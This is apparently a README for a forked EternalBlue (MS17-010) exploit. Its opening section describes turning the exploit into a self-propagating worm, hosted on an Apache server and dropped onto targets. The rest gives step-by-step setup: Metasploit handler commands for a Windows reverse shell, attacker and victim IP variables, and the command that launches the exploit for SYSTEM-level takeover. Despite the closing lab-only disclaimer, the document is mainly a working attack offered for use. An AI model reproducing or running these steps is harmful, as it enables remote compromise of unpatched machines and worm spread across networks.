Usage:
1. Clone the code to any directory on Windows.
2. Install pyinstaller:
python2 -m pip install pyinstaller
Note: this must be Python 2.
3. python2 -m pip install impacket
4. C:\Python27\Scripts\pyinstaller.exe -F eternalblue_exploit7.py
Then copy the exe from the dist folder into /var/www/html on Kali and rename it e.exe.
5. Clone another copy of the repository onto Kali.
6. Run ./worm_start.sh
7. service apache2 start
Place the 1.exe from /var/www/html on the target machine and it can be run there.
Of course, there are many things that need to be changed first, in main.go and worm_start.sh; they are simple, so look through them and change them yourself. It is not covered here. This is, without doubt, a worm.
Also, this version is an inefficient one; it only has a certain probability of worming successfully.
This repository is forked from the fantastic work by Worawit on the NSA exploit leaked by the ShadowBrokers.
This is a Python port of the exploit and has excellent reliability for exploiting Windows versions that are vulnerable to MS17-010/EternalBlue. Use the checker.py script to see if the target is unpatched/vulnerable.
Worawit's script is great, but it is not simple or quick to compile and has many moving parts to get up and running. It is necessary to work with raw assembly language, shellcode for multiple architectures, msfconsole, etc.
What I have created is a very handy bash script which does all of the hard work for you and also gives instructions on how to exploit.
Knowing how the exploit works is a lot more fun than firing up Metasploit. I also created this out of necessity for the PWK course and the OSCP certification. Those of you undertaking either will be well aware that Metasploit is extremely limited during exam time, so this exploit offers you a fast, reliable and allowed way to exploit any targets with ports 445/139 open that are vulnerable.
My generation script will output 2 files that can be read into msfconsole by using the -r flag (msfconsole -r /root/EternalBlueX64.rc), so you don't have to keep typing out:
use exploit/multi/handler
set PAYLOAD windows/x64/shell_reverse_tcp
set EXITFUNC thread
set ExitOnSession false
set LHOST 192.168.*.**
set LPORT 5555
exploit -j
It's very reliable; I have not come across an unpatched Windows 7 PC that it has not worked against (in the PWK and personal lab environments). If the system is vulnerable and it does not work the first time around, keep trying, or take a break and regenerate the shellcode again and again; eventually you will own the computer and have full nt authority\system rights on the pwned system.
To get up and running there are 2 things you need to do: open the start.sh file, add your own IP as attackerIP and the victim OS IP as vulnerableIP. You can optionally change the port numbers that msfconsole will listen on, but generally you can leave them as is.
# change these values to your attacking IP and 2 ports for 32bit/64bit Architecture
attackerIP=192.168.2.133 # put your ip here*
vulnerableIP=192.168.2.253 # put the victim ip here*
arch_x86_port=4444 # x86 msfconsole multi handler port (optional change)
arch_x64_port=5555 # x64 msfconsole multi handler port (optional change)
Fire up the script and just follow the on-screen instructions after the 7-step generation process.
./start.sh
You will then need to copy 3 lines from the output: 1 is the actual execution of the Python eternalblue_exploit7.py exploit and the other 2 are the msfconsole helpers that start up 2 exploit/multi/handlers. They will look similar to the following, but you'll see your specific commands in the output.
msfconsole -r "/root/MS17-010/output/EternalBlueX64.rc"
msfconsole -r "/root/MS17-010/output/EternalBlueX86.rc"
python /root/MS17-010/eternalblue_exploit7.py 192.168.*.** /root/MS17-010/bin/sc_all.bin 3
Do not use this on systems unless you have been given explicit permission. This is created for use in the PWK labs and OSCP exam lab. It may have unprecedented consequences, both legally and ethically, if used inappropriately. This is a POC script and I bear no responsibility for its use by others.